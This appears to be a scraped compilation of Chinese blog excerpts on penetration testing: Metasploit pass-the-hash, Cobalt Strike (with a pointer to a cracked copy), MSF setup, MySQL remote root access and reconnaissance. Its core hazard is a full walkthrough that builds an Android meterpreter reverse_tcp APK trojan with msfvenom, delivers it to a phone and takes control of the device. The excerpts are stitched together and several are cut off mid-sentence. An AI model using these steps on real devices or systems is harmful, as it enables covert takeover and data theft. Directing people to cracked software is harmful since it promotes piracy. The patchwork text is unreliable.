msf

MSF内网渗透哈希传递攻击

一曲冷凌霜 提交于 2019-12-19 03:02:13
条件 :获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口打开着,可利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(只能是administrator用户的LM-hash和NTLM-hash),这个利用跟工作组环境或者域环境无关。 这个网站提供对密码转换成 LM-Hash 和 NTLM-Hash 的操作:https://asecuritysite.com/encryption/lmhash 来源: CSDN 作者: L-socks 链接: https://blog.csdn.net/zzlx123/article/details/103595197

Cobalt Strike学习笔记

生来就可爱ヽ(ⅴ<●) 提交于 2019-12-16 10:50:16
  Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。Cobalt Strike主要用于团队作战,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。    Cobalt Strike ,据说现在最新版为3.9,主要分为试用版和付费版,试用版为21天,付费版3500美元,据说网上也有一些 破解教程 , cobaltstrik3.6破解版下载 密码: 51tg。因为Cobalt Strike是美国对外限制型出口软件,只在美国和加拿大允许发售,所以我们需要google搜索下usa的个人代理来绕开限制。 0x01 安装与运行   Cobalt Strike需要JAVA环境,需要注意的是JAVA环境不要安装最新版,否则会出一些问题,Cobalt Strike分为客户端和服务端可分布式操作可以协同作战。但一定要架设在外网上,或者自己想要搭建的环境中,服务器端只能运行在Linux系统上。其中关键的文件是teamserver以及cobaltstrike.jar,将这两个文件放到服务器上同一个目录,然后运行:

msf渗透安卓手机

安稳与你 提交于 2019-12-15 01:42:14
正文开始 首先你需要kali系统 生成木马 首先ifconfig查看本机在局域网内的ip 使用msfvenom生成apk木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=你在局域网内的IP(我的是192.168.0.13) LPORT=监听的端口(我用的是8888) R > /root/木马的名字(我用的是1).apk 然后打开主目录就能看到刚刚生成的木马了 接下来把它发送到手机上 然后启动msf 命令为 msfconsole 依次执行 use exploit/multi/handler加载攻击模块 set payload android/meterpreter/reverse_tcp 选择要使用的Payload 接下来输入show options 箭头指着的就是需要改的内容 输入set LHOST(你的ip) 接着输入 set LPORT(你刚刚输入的端口) 接着把木马发送到手机上 然后终端执行exploit 再在手机上运行刚刚安装的木马 弹出对话 这样你就控制了这个手机 接下来可以执行一些命令 比如sysinfo就是查看系统 输入help就可以查看指令执行了 来源: https://www.cnblogs.com/M0rta1s/p/12041734.html

Metasploit笔记

徘徊边缘 提交于 2019-12-10 00:17:09
  Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。 0x01 基本操作 1、运行   Shell中直接输入msfconsole 2、建立搜索缓存(数据库) 启动PostgreSQL数据库服务 :service postgresql start 监听5432端口 初始化Metasploit数据库 :msfdb init 查看数据库联接情况 :msfconsole db_status 建立数据库缓存 :msfconsole db_rebuild_cache 3、专业术语 12345 – Exploit,攻击工具/代码 – Payload,攻击载荷 – Shellcode – Module,模块 – Listener,监听器 4、Metasploit主目录 Kali Linux /usr/share/metasploit-framework 5、常用命令 123456789101112 show exploits – 查看所有可用的渗透攻击进程代码 show auxiliary – 查看所有可用的辅助攻击工具 show options – 查看该模块所有可用选项 show

[后渗透]Metasploit使用基础

两盒软妹~` 提交于 2019-12-06 03:05:17
0x00 简介 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。 0x01 配置MSF的数据库 首先配置下MSF的数据库:可提升查询攻击模块的速度,以及利用速度 1.1 进入msf 查询数据库连接情况:发现默认情况下并未连接数据库 $msf> db_status 1.2 配置数据库 $service postgres enable $service postgres start $msfdb init 1.3 连接密码 看到上面的配置文件的提示,就可以通过文件地址,查看连接密码: $cat /usr/share/metasploit-framework/config/database.yml 1.4 查询 知道密码后,再次进入msf,通过db_connect 查询如何写连接的命令: 1.5 连接 再用用账号密码去连,最后 db

MSF MySQL探测模块归纳

蓝咒 提交于 2019-12-05 17:53:55
MySQL开启远程访问 将host字段的值改为%就表示在任何客户端机器上能以root用户登录到mysql服务器,建议在开发时设为%。 update user set host = ’%’ where user = ’root’; 将权限改为ALL PRIVILEGES mysql> use mysql; Database changed mysql> grant all privileges on *.* to root@'%' identified by "password"; Query OK, 0 rows affected (0.00 sec) mysql> flush privileges; Query OK, 0 rows affected (0.00 sec) mysql> select host,user,password from user; +--------------+------+-------------------------------------------+ | host | user | password | +--------------+------+-------------------------------------------+ | localhost | root |

2019-11-25:信息收集,笔记

爱⌒轻易说出口 提交于 2019-12-05 15:04:52
msf复现iis 6.0溢出漏洞cve-2017-7269 win2013 r2+iis 6.0,webdav开启,可以使用msf来getshell 非win2013 r2的系统,启用webdav插件,可以直接put木马txt文件到服务器,然后通过move方式改名为asp,去getshell 信息收集 分类: 主动信息收集:攻击者或者渗透测试人员通过工具去主动去探测或者收集目标的信息,直接和目标接触 被动信息收集:不去直接接触目标,而是通过收索引擎或者爬虫系统去收索关于目标的信息 作用:为后期渗透测试打基础,渗透测试的本质就是在信息收集 指纹识别 生物指纹识别:手上指纹、虹膜、DNA、音频、面部等等 指纹识别常见的检测对象: (1)CMS<内容管理系统>信息,常见CMS有:dede织梦、worepress、phpcms、thinkphp、ezcms、ecshop、帝国、大汉CMS、discuz、魅力、海洋cms、逐浪CMS Zoomla、drupal、EarCMS、思途CMS (2)前端技术:HTML5 、jquery、bootstrap、pure、ace、ajax等等 (3)中间件和容器等:apache 、IIS、Nginx、lighttpd、tomcat、weblogic、jboss、websphere等等 (4)开发语言:php java ruby go python c#

云服务器上安装MSF环境

有些话、适合烂在心里 提交于 2019-12-05 10:06:57
在校园网内,禁止使用路由器之类的,所以就导致自己本地虚拟机环境出现各种各样的网络问题,解决起来过于繁琐,为此在服务器上安装MSF 0x00 安装MSF 使用 Xshell 等工具连上远程服务器后,首先确保服务器的网络是可以正常访问外网的 使用 curl http://dyboy.cn 测试一下 网络没问题,接下来命令如下 // 切换目录 cd /home // 获取MSF安装脚本 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall // 修改权限 chmod 755 msfinstall // 开始安装 ./msfinstall 等待一会儿就安装好了,服务器的入网带宽是非常高的,即服务器的下载速度很快 0x01 安装postgresql 因为 MSF 需要记录一些数据,依赖于 postgresql ,因此还需要安装 同样在当前 home 目录下 // 获取安装 apt-get install postgresql // 切换到postgres用户 su postgres // 登录postgresql数据库,首次登录没有密码 psql //

渗透测试学习 三十一、MSF

旧巷老猫 提交于 2019-12-04 20:07:52
术语 测试者利用系统程序或服务的漏洞进行攻击的一个过程——渗透攻击(exploit),攻击载荷(payload) 攻击者在目标系统上执行的一段代码,该代码具有反弹链接,创建用户、执行其他系统命令的功能。 shellcode 在目标机器上运行的一段机器指令,成功执行后会返回一个shell 模块(module) 指metasploit框架中所使用的一段软件代码组件 运行 msfconsole service postgresql start service metasploit start msfconsole 输入db_status 查看数据库连接状态 workspace –a test 创建一个工作台 删除 –d 选项 进入test工作台 Wordspace test 使用nmap db_nmap –sS 192.168.1.1 扫描主机 db_export 1.xml 导出扫描结果 db_inport 1.xml 导入扫描结果 hosts 查看扫描结果 ~#/etc/init.d/postgresql start ~#su –postgres createuser msf –p created –owher=msf msf3 exit 信息搜集 whois查询 msf>whois example.com msf>whois 192.168.1.1 msf>use